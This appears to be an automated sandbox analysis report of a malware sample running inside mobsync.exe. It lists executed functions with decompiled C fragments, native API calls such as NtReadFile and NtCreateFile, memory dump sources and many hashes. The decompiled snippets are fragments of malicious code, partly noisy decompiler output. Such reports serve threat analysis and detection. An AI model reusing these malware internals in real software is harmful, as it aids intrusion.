Opcode Fuzzy Hash: 4c2a37786e1de0098514a467bde8269a5f1800b32b007f56f287c8d2adde55fa
Instruction Fuzzy Hash: 3921FE7385524A9FEB10CFA8E8921D6F3B9FB4033076400A6D8008F852E261A46BCBE5

Uniqueness

Uniqueness Score: -1.00%

Function 038C21A6, Relevance: 6.3, Strings: 5, Instructions: 91COMMON

Download Yara Rule

Strings

i^]i, xrefs: 038C2261
l\V, xrefs: 038C21F3
3[]i, xrefs: 038C21AD
]m\V, xrefs: 038C224C
7l\V, xrefs: 038C2199

Memory Dump Source

Source File: 00000000.00000003.684981069.00000000038C0000.00000004.00000001.sdmp, Offset: 0384C000, based on PE: false

Associated: 00000000.00000003.691099146.000000000384C000.00000004.00000001.sdmp Download File

Similarity

API ID:
String ID: l\V$3[]i$7l\V$]m\V$i^]i
API String ID: 0-435519228
Opcode ID: 1a001a2f75d4fa2ba1d9e311f7508e4a41fed56ac3fa9dff848cb281120ab4fd
Instruction ID: 46be0601ef524627dd7b147ad9ef327be57243490e7d8d440874d70e98ec74a7
Opcode Fuzzy Hash: 1a001a2f75d4fa2ba1d9e311f7508e4a41fed56ac3fa9dff848cb281120ab4fd
Instruction Fuzzy Hash: B821AF7385524A9FEB10CFA4A4821D2F7B9FB5172076401AADC009F812E631E56BDBD1

Uniqueness

Uniqueness Score: -1.00%

Function 03802505, Relevance: 5.1, Strings: 4, Instructions: 120COMMON

Download Yara Rule

Strings

i^]i, xrefs: 03802631
l\V, xrefs: 038025C3
7l\V, xrefs: 03802569
]m\V, xrefs: 0380261C

Memory Dump Source

Source File: 00000000.00000003.676143158.0000000003800000.00000004.00000001.sdmp, Offset: 03800000, based on PE: false

Associated: 00000000.00000003.684002623.0000000003800000.00000004.00000001.sdmp Download File
Associated: 00000000.00000003.691099146.000000000384C000.00000004.00000001.sdmp Download File

Similarity

API ID:
String ID: l\V$7l\V$]m\V$i^]i
API String ID: 0-1990758405
Opcode ID: 7fdbbe7c01cb2f7898c0da8ef35e16be08f823c6cf3229f48e82a5510a0bfad6
Instruction ID: 3fc394077c858d84741b203a8343acd1d31067182828c4d8739e81f37f74d22c
Opcode Fuzzy Hash: 7fdbbe7c01cb2f7898c0da8ef35e16be08f823c6cf3229f48e82a5510a0bfad6
Instruction Fuzzy Hash: D531CC738546059FDB50CFA4E8925E6F7BAFB1473076405E6D8008F812E372A56B8BE1

Uniqueness

Uniqueness Score: -1.00%

Function 038C2135, Relevance: 5.1, Strings: 4, Instructions: 120COMMON

Download Yara Rule

Strings

i^]i, xrefs: 038C2261
l\V, xrefs: 038C21F3
]m\V, xrefs: 038C224C
7l\V, xrefs: 038C2199

Memory Dump Source

Source File: 00000000.00000003.684981069.00000000038C0000.00000004.00000001.sdmp, Offset: 0384C000, based on PE: false

Associated: 00000000.00000003.691099146.000000000384C000.00000004.00000001.sdmp Download File

Similarity

API ID:
String ID: l\V$7l\V$]m\V$i^]i
API String ID: 0-1990758405
Opcode ID: 600cfef7c0ed6caaff1ef174aaf7d5d2a81a5446b5c581721feef592f1ef565c
Instruction ID: 1732a6b49833ac58faf03fba6cd6aab939821cddd462aa0d307df84258a256dd
Opcode Fuzzy Hash: 600cfef7c0ed6caaff1ef174aaf7d5d2a81a5446b5c581721feef592f1ef565c
Instruction Fuzzy Hash: B63197728542499FDB10CAA4E4825E2F3BAFB1473076445AAD8008B812E631F46B8BE1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: mobsync.exe PID: 6648 Parent PID: 7088 mobsync.exeCOMMON

Executed Functions

Function 7249868A, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 37
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E7249868A(void* __esi, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, char _a28, intOrPtr _a32, char _a36) {
				intOrPtr _v0;
				void* _t20;
				void* _t29;
				intOrPtr* _t31;
				void* _t33;
				void* _t36;

				 *(__esi + 0x5509e0f7) =  *(__esi + 0x5509e0f7) >> 0x8b;
				_t15 = _v0;
				_t31 = _v0 + 0xc48;
				E724991E0(_t29, _v0, _t31,  *((intOrPtr*)(_t15 + 0x10)), 0, 0x2a);
				_t6 =  &_a36; // 0x72493a31
				_t8 =  &_a28; // 0x72493d72
				_t14 =  &_a4; // 0x72493d72
				_t20 =  *((intOrPtr*)( *_t31))( *_t14, _a8, _a12, _a16, _a20, _a24,  *_t8, _a32,  *_t6, __esi, _t33, _t36); // executed
				return _t20;
			}

0x7249868b
0x72498693
0x7249869f
0x724986a7
0x724986ac
0x724986b2
0x724986cd
0x724986d5
0x724986d9

APIs

NtReadFile.NTDLL(r=Ir,5E972F65,FFFFFFFF,?,?,?,r=Ir,?,1:Ir,FFFFFFFF,5E972F65,72493D72,?,00000000), ref: 724986D5

Strings

1:Ir, xrefs: 724986AC, 724986B8
r=Ir, xrefs: 724986CD, 724986D4
r=Ir, xrefs: 724986B2, 724986C0

Memory Dump Source

Source File: 00000005.00000002.779255223.0000000072480000.00000040.00000001.sdmp, Offset: 72480000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: 1:Ir$r=Ir$r=Ir
API String ID: 2738559852-2263273510
Opcode ID: b0eac7f2a604d16a8c939d3aaa399d0e0b8353029024a6808b0baf2d73168aec
Instruction ID: a6b5613f1c43e87691086da10140b75b9313a8db5f551a3f529b81664efb9e49
Opcode Fuzzy Hash: b0eac7f2a604d16a8c939d3aaa399d0e0b8353029024a6808b0baf2d73168aec
Instruction Fuzzy Hash: 39F0E7B2200209AFCB14CF98CC85DEB77A9FF8C354F158648BA5D97290D630E911CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 72498690, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E72498690(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E724991E0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x72493a31
				_t6 =  &_a32; // 0x72493d72
				_t12 =  &_a8; // 0x72493d72
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
				return _t18;
			}

0x72498693
0x7249869f
0x724986a7
0x724986ac
0x724986b2
0x724986cd
0x724986d5
0x724986d9

APIs

NtReadFile.NTDLL(r=Ir,5E972F65,FFFFFFFF,?,?,?,r=Ir,?,1:Ir,FFFFFFFF,5E972F65,72493D72,?,00000000), ref: 724986D5

Strings

1:Ir, xrefs: 724986AC, 724986B8
r=Ir, xrefs: 724986CD, 724986D4
r=Ir, xrefs: 724986B2, 724986C0

Memory Dump Source

Source File: 00000005.00000002.779255223.0000000072480000.00000040.00000001.sdmp, Offset: 72480000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: 1:Ir$r=Ir$r=Ir
API String ID: 2738559852-2263273510
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: 1c9a813797a110df30d896115a6898fce3f7ef3a7775591708ad8987fb8e30e9
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: 76F0A4B2200208ABDB14DF89DC85EEB77ADAF8C754F158248BA1D97251DA30E911CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 72498632, Relevance: 1.6, APIs: 1, Instructions: 70filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,72488B13,?,72493BB7,72488B13,FFFFFFFF,?,?,FFFFFFFF,72488B13,72493BB7,?,72488B13,00000060,00000000,00000000), ref: 7249862D

Memory Dump Source

Source File: 00000005.00000002.779255223.0000000072480000.00000040.00000001.sdmp, Offset: 72480000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: f918cb1f7ed58381885facbb277995b977c82b2b8d48c4b352453357155fddb7
Instruction ID: a860eca154dcfe178a30d20bf4369d5b06b5854d0f18b93d175b4a788e9496d5
Opcode Fuzzy Hash: f918cb1f7ed58381885facbb277995b977c82b2b8d48c4b352453357155fddb7
Instruction Fuzzy Hash: 8C11C6B6204508ABDB14CF98DC85DEB77A9EF8C754B258648FA5DD7240D630E811CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 724985E0, Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E724985E0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E724991E0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}

0x724985ef
0x724985f7
0x7249862d
0x72498631

APIs

NtCreateFile.NTDLL(00000060,72488B13,?,72493BB7,72488B13,FFFFFFFF,?,?,FFFFFFFF,72488B13,72493BB7,?,72488B13,00000060,00000000,00000000), ref: 7249862D

Memory Dump Source

Source File: 00000005.00000002.779255223.0000000072480000.00000040.00000001.sdmp, Offset: 72480000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 72989906d6faa31a56477962e88ce9834f1f47e7ada4a27c13a9cd90a45812bb
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: A5F0B2B2204208ABCB08CF88DC85EEB77ADAF8C754F158248FA0D97240C630E811CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 7249870A, Relevance: 1.5, APIs: 1, Instructions: 21
nativeCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E7249870A(void* _a4) {
				intOrPtr _v0;
				long _t8;
				void* _t11;

				asm("aas");
				asm("insd");
				asm("rol edx, cl");
				_t5 = _v0;
				_t2 = _t5 + 0x10; // 0x300
				_push(0x8bec8b55);
				_t3 = _t5 + 0xc50; // 0x72489763
				E724991E0(_t11, _v0, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a4); // executed
				return _t8;
			}

0x7249870b
0x7249870c
0x7249870d
0x72498713
0x72498716
0x72498719
0x7249871f
0x72498727
0x72498735
0x72498739

APIs

NtClose.NTDLL(72493D50,?,?,72493D50,72488B13,FFFFFFFF), ref: 72498735

Memory Dump Source

Source File: 00000005.00000002.779255223.0000000072480000.00000040.00000001.sdmp, Offset: 72480000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 302eff3e6a597e16a2a67db59d4018aa2f2deae3bd51ae5f5a3adfefaab6455a
Instruction ID: 2a7d2bdfaee3ba413f6c146f9078146302ea1d785cc32f40baeebbaaf60beab8
Opcode Fuzzy Hash: 302eff3e6a597e16a2a67db59d4018aa2f2deae3bd51ae5f5a3adfefaab6455a
Instruction Fuzzy Hash: 8FD02B7E40D2C40BDB11DAF468C50D37F44ED506247155ACED8A407603C134970AD7D1

Uniqueness

Uniqueness Score: -1.00%

Function 72498710, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E72498710(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x72489763
				E724991E0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}

0x72498713
0x72498716
0x7249871f
0x72498727
0x72498735
0x72498739

APIs

NtClose.NTDLL(72493D50,?,?,72493D50,72488B13,FFFFFFFF), ref: 72498735

Memory Dump Source

Source File: 00000005.00000002.779255223.0000000072480000.00000040.00000001.sdmp, Offset: 72480000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: b96f8f29bc04b463bdbaf386d3e16e847137ea189777c4b74b2d977d26ef12e6
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: 1AD012752002146BD710DBD8CC49E977B5CEF44750F154459BA585B241C530F600C6E0

Uniqueness

Uniqueness Score: -1.00%

Function 04A895D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04A895DA

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9f7b0d7a454594114ea621908c691df292faf72955a2fdd1fff7f2edebbc67d9
Instruction ID: bb61af0029e1bc83def348ebf8bb8c3fc945277298b2cebc7570b8858625b356
Opcode Fuzzy Hash: 9f7b0d7a454594114ea621908c691df292faf72955a2fdd1fff7f2edebbc67d9
Instruction Fuzzy Hash: 0E9002A120200003650571694514616408A97E0245B51C021E1005590DC565DCD17175

Uniqueness

Uniqueness Score: -1.00%

Function 04A89540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04A8954A

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: abd85f8f77bcd86b55e22d6a1d7a0b32059179a77184ff72a669d265ea7ebbe9
Instruction ID: 5dca2501332fb431e990b4419d10820af26c584afb2342ceec0516a8bf60a730
Opcode Fuzzy Hash: abd85f8f77bcd86b55e22d6a1d7a0b32059179a77184ff72a669d265ea7ebbe9
Instruction Fuzzy Hash: 0A900265211000032505A569070450700C697D5395351C021F1006550CD661DCA16171

Uniqueness

Uniqueness Score: -1.00%

Function 04A896E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04A896EA

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 48fb9eda304601fdf412ecff514aeb714dab5736a3e8ecd18c7ff6eb30242e0e
Instruction ID: 8f16db1938995298ee49374cfa7e321100ad76ef98b37100d218b0647907589f
Opcode Fuzzy Hash: 48fb9eda304601fdf412ecff514aeb714dab5736a3e8ecd18c7ff6eb30242e0e
Instruction Fuzzy Hash: 1790027120108802F5106169850474A008597D0345F55C411A4415658D86D5DCD17171

Uniqueness

Uniqueness Score: -1.00%

Function 04A897A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04A897AA

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f3d390ef2940cdc397207c1da25dd537c5230927fe21218a6ddad72797e4fae5
Instruction ID: 1c9d5547cfc02248ed89657b7b10f14ae62c2a7886fdda247d2663620ccc1d08
Opcode Fuzzy Hash: f3d390ef2940cdc397207c1da25dd537c5230927fe21218a6ddad72797e4fae5
Instruction Fuzzy Hash: BE90026130100003F540716955186064085E7E1345F51D011E0405554CD955DC966272

Uniqueness

Uniqueness Score: -1.00%

Function 04A89780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04A8978A

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 89dfe21b5af8eee5607edb7dc92e34e1f935387ad3ded1cfcfd1f5bc705c73c9
Instruction ID: 6cb1b36cd8362dc0f4e3babe42df29f8c0489997b54b438c30b7861625e748cc
Opcode Fuzzy Hash: 89dfe21b5af8eee5607edb7dc92e34e1f935387ad3ded1cfcfd1f5bc705c73c9
Instruction Fuzzy Hash: 8890026921300002F5807169550860A008597D1246F91D415A0006558CC955DCA96371

Uniqueness

Uniqueness Score: -1.00%

Function 04A89FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04A89FEA

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7fd3d13dfb446ddb0147f4ae4d05603ecfb66e59fc8dccbc89ecc8e3f75becf5
Instruction ID: a041621940d0fd57d02861fee57ccf5f1150bf1b64611b2637469cc1b1a9d754
Opcode Fuzzy Hash: 7fd3d13dfb446ddb0147f4ae4d05603ecfb66e59fc8dccbc89ecc8e3f75becf5
Instruction Fuzzy Hash: B090027131114402F51061698504706008597D1245F51C411A0815558D86D5DCD17172

Uniqueness

Uniqueness Score: -1.00%

Function 04A89710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04A8971A

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e9130534c68b697330188356920d7d0d8ec0a756c82cd08c8be09350cdd0b108
Instruction ID: f721fbd0606a9c7a5212fe36478eaa4eca2c2c78928d03015a8778690daf0706
Opcode Fuzzy Hash: e9130534c68b697330188356920d7d0d8ec0a756c82cd08c8be09350cdd0b108
Instruction Fuzzy Hash: F890027120100402F50065A95508646008597E0345F51D011A5015555EC6A5DCD17171

Uniqueness

Uniqueness Score: -1.00%

Function 04A89860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04A8986A

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 73110dee192ec4bf816a5a9481a8e1e43744216c1ddb91203574bde2ed7d8ab6
Instruction ID: e60e32eeedd5a2215a2710479840e0b5b12d7e09bfcad8643425002d7b5b9ab1
Opcode Fuzzy Hash: 73110dee192ec4bf816a5a9481a8e1e43744216c1ddb91203574bde2ed7d8ab6
Instruction Fuzzy Hash: 5A90027120100413F51161694604707008997D0285F91C412A0415558D9696DD92B171

Uniqueness

Uniqueness Score: -1.00%

Function 04A89840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04A8984A

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: cb345536716af317ece7109e92ef8e9848c3a181767799e60099f5a153dd0135
Instruction ID: 77366dfcb4caf59e6a5e53188b656c35a92e6795939b3bce6023fb7f46587660
Opcode Fuzzy Hash: cb345536716af317ece7109e92ef8e9848c3a181767799e60099f5a153dd0135
Instruction Fuzzy Hash: C8900261242041527945B16945045074086A7E0285791C012A1405950C8566EC96E671

Uniqueness

Uniqueness Score: -1.00%

Function 04A899A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04A899AA

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c7f31cc34e162f058f052eab5bfd0eff1123de520f069596e809942267672433
Instruction ID: 88089017f977aa3bf8a15faf88faae9305cc15d2f517b5d2f739a66306d51c87
Opcode Fuzzy Hash: c7f31cc34e162f058f052eab5bfd0eff1123de520f069596e809942267672433
Instruction Fuzzy Hash: 799002A134100442F50061694514B060085D7E1345F51C015E1055554D8659DC927176

Uniqueness

Uniqueness Score: -1.00%

Function 04A89910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04A8991A

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 67b2ae7ce5767b15ed2802bb1bda56d8404db1783499162fafa6bc572fc33f87
Instruction ID: ab3bcba7cd84e395b5177b7577da3bd933986ecd95c6abc3b2b9fbde4587a856
Opcode Fuzzy Hash: 67b2ae7ce5767b15ed2802bb1bda56d8404db1783499162fafa6bc572fc33f87
Instruction Fuzzy Hash: B39002B120100402F54071694504746008597D0345F51C011A5055554E8699DDD576B5

Uniqueness

Uniqueness Score: -1.00%

Function 04A89A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04A89A2A

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3cf66dd2ec7bf68548a2e36befa358ef4f39141ad80b92202b44d837c5aa90f4
Instruction ID: 90adc8021aaf53914029729caa90cd94ee19a96877b8ed2c62a30054b15774bc
Opcode Fuzzy Hash: 3cf66dd2ec7bf68548a2e36befa358ef4f39141ad80b92202b44d837c5aa90f4
Instruction Fuzzy Hash: BA900261601000426540717989449064085BBE1255751C121A0989550D8599DCA566B5

Uniqueness

Uniqueness Score: -1.00%

Function 04A89A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04A89A5A

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8d2fd334b75aab8b20e96f36dbcf6f2bf43ae66c602c83f1877f876ee3e8d5ca
Instruction ID: 4a8f267aabd07227a31e1df1fe67c26af1049dcc9b4cd3862b01ca16a3a76ee8
Opcode Fuzzy Hash: 8d2fd334b75aab8b20e96f36dbcf6f2bf43ae66c602c83f1877f876ee3e8d5ca
Instruction Fuzzy Hash: 0E90026121180042F60065794D14B07008597D0347F51C115A0145554CC955DCA16571

Uniqueness

Uniqueness Score: -1.00%

Function 724988EA, Relevance: 3.0, APIs: 2, Instructions: 41
memoryCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E724988EA(intOrPtr __edx, void* __eflags, intOrPtr _a4, int _a8, long _a12, void* _a16) {
				intOrPtr _v117;
				char _t19;
				void* _t28;

				asm("adc al, 0xd2");
				if(__eflags != 0) {
					asm("adc dl, [edx-0x741374ab]");
					_t13 = _a4;
					E724991E0(_t28, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t13 + 0xa14)), 0, 0x36);
					ExitProcess(_a8);
				}
				_v117 = __edx;
				_push(_t33);
				_t16 = _a4;
				_push(_t29);
				_t5 = _t16 + 0xc74; // 0xc74
				E724991E0(_t28, _a4, _t5,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t19 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t19;
			}

0x724988ea
0x724988ec
0x7249892e
0x72498933
0x7249894a
0x72498958
0x72498958
0x724988ef
0x724988f0
0x724988f3
0x724988f9
0x724988ff
0x72498907
0x7249891d
0x72498921

APIs

RtlFreeHeap.NTDLL(00000060,72488B13,?,?,72488B13,00000060,00000000,00000000,?,?,72488B13,?,00000000), ref: 7249891D
ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 72498958

Memory Dump Source

Source File: 00000005.00000002.779255223.0000000072480000.00000040.00000001.sdmp, Offset: 72480000, based on PE: true

Yara matches

Similarity

API ID: ExitFreeHeapProcess
String ID:
API String ID: 1180424539-0
Opcode ID: 29dfacbdaeb393ad48fbb4b9e0d204e6e88ac50d7291cfbcf16ef32133a97b16
Instruction ID: 2960acc1c1ff3dfb7ed33a773dc104ebcea6481002b49f327541b1ffa3b9fb94
Opcode Fuzzy Hash: 29dfacbdaeb393ad48fbb4b9e0d204e6e88ac50d7291cfbcf16ef32133a97b16
Instruction Fuzzy Hash: 13F0FFB52082007FDB12DF68CC89ED77F68AF89360F14859CF8995B202C530EA15CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 72487280, Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E72487280(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E7249A140( &_v67, 0, 0x3f);
				E7249AD20( &_v68, 3);
				_t13 = E72493E50(_a4 + 0x1c, E72489B40(_t30, _a4 + 0x1c,  &_v68), 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E724892A0(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}

0x72487280
0x7248728f
0x72487293
0x7248729e
0x724872be
0x724872c3
0x724872ca
0x724872cd
0x724872da
0x724872dc
0x724872de
0x724872fb
0x724872fb
0x00000000
0x724872fd
0x72487302

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 724872DA

Memory Dump Source

Source File: 00000005.00000002.779255223.0000000072480000.00000040.00000001.sdmp, Offset: 72480000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: a271e98b840e7aeb9c1762b8cbeba5b37bfccb229aa70020c2558aa4b881ac8a
Instruction ID: ab09ab5cdfbb717e7eea85730147047744c497c7377246bea25bf7ccf9574c63
Opcode Fuzzy Hash: a271e98b840e7aeb9c1762b8cbeba5b37bfccb229aa70020c2558aa4b881ac8a
Instruction Fuzzy Hash: 0001A732A9022977E72196989C02FBE7B6C6B41B51F140118FF44BE2C0EA947A0646F6

Uniqueness

Uniqueness Score: -1.00%

